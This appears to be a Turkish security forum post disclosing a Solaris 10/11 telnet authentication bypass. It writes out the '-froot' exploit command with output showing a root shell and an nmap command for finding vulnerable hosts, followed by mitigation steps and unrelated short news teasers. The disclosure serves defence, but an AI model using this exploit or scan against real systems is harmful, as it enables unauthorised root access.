Solaris Sistemlerde Ciddi Güvenlik Açığı

0
FZ
Dün yayınlanan ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık 1994 yılında bazı UNIX sistemlerinde de görülmüştü.

Güvenlik açığını nasıl test edersiniz?

$telnet -l -fkullanici_adi hedef_sistem

fbsd~$ telnet -l -froot 10.1.1.1

Trying 10.1.1.1...

Connected to 10.1.1.1.

Escape character is '^]'.

[ Trying mutual KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

[ Trying KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

Last login: Mon Feb 12 15:20:12 on console

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005

Sourcing //.profile-EIS.....

root@solaris-test #

Ek olarak ağınızdaki Solaris tabanlı telnet sunucuları bulmak için nmap kullanabilirsiniz.

#nmap -sV  -p23 AĞ_Bloğunuz -oG solaris_telnet|grep "Sun Solaris"

Korunma Yolları

1) Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.

Telneti kapatmak için

solaris-test# svcadm disable telnet

2)Telnet servisi açık kalması gerekiyorsa öncelikle sisteme root kullanıcısının erişimi kısıtlanmalı. Bu en azından sisteme en yetkili hesapla bağlanılmasını engeller fakat sistemdeki diğer kullanıcıların(sys,adm, lp, vs.) sisteme parolasız erişimi hala mümkün olmaktadır.

Adım Adım telnet ile sisteme root erişimini engellemek /etc/default/login dosyası açılır. #CONSOLE=/dev/console satırı bulunur ve başındaki # kaldırılır. 3)Telnet servisine yapılan erişimler IP tabanlı kısıtlanabilir. Bunun için Solaris'de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,

Telnet servisine için tcp_wrapper desteği verilir

#inetadm -m telnet tcp_wrappers=TRUE

ve /etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/ağlara erişim tanımlanır.

Huzeyfe ÖNAL - huzeyfe at enderunix.org

Görüşler

0
elrond
Şaka gibi bir açık bu. Şirkette adminlere söyledim kapatın şu rezillikleri diye inanmadılar ilk başta...

Asıl garip olan niye şimdi public oldu...
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Metasploit artık Rapid7'nin

caiaphas_

Uzun zamandan beri hem UNIX hem de WIN32 üzerinde başarı ile çalışan ve tüm otoriteler tarafından da en çok tercih edilen penetrasyon aracı olan Metasploit Rapid7 tarafından satın alındı.

Açık kaynak desteğinin devam edip etmeyeceği Metasploit tarafından yapılan açıklama ile netlik kazandı. Metasploit açık kaynak kod üretmeye devam edecek, bunun yanında Rapid7'nin güvenlik açığı tarama ürünü olan NeXpose ile de entegre edilecek. Habere göre HD Moore dahil pek çok Metasploit geliştiricisinin Rapid7 ekibine katıldığı da ayrıca belirtiliyor. HD bundan sonra güvenlik şefi olarak görevine devam edecek.

512 Byte'lık Güvenlik Koduna 3 Tane Bug Nasıl Sığdırılır?

darkhunter

Microsoft'un oyun platformu xbox'ın, boot sırasında çağırdığı 512 Byte'lık güvenlik kodunda 3 adet bug tespit edilmiş...

512 Byte'lık koda 3 adet bug sığdırmayı başaran Microsoft'u kutluyor, başarılarının devamını diliyorum...

Not: FM Forum'da konuyu gündeme getiren "abc"ye teşekkürler.

Netsec Güvenlik Bülteni: Sayı 30 – 18.07.2010

anonim

Netsec ağ ve bilgi güvenliği listesi üyeleri tarafından hazırlanan güvenlik bülteninin 30. sayısı çıktı.

İngilizler, Ruslar ve Şifreler

FZ

II. Dünya Savaşı sırasında Bletchley Park´ta çalışan başta Turing olmak üzere matematikçilerin, dilbilimcilerin ve diğerlerinin Almanların Enigma şifresini çözme maceraları konu ile ilgilenenlerin malumudur.

Ancak İngiliz şifre analizcilerinin Sovyetler Birliği şifreleri ilgili yaptıkları önemli çalışmalar yakın bir döneme dek bir sır perdesi ile örtülü idi.

Açık Kaynağın Yararları

Soulblighter

Geçen hafta çalınan Windows 2000 kaynak kodlarını inceleyen iyi niyetli :) bir yazılımcı, IE 5 gözatıcısında açık tespit etti.

Bu açık kullanılarak, bitmap dosyası ile (ne alakaysa, klasik M$ açığı) kullanıcının bilgisayarında aşırı yüklenme meydana getirilebiliyor. Açığı bulan yazılımcı, haberi www.securitytracker.com adresinde duyurdu.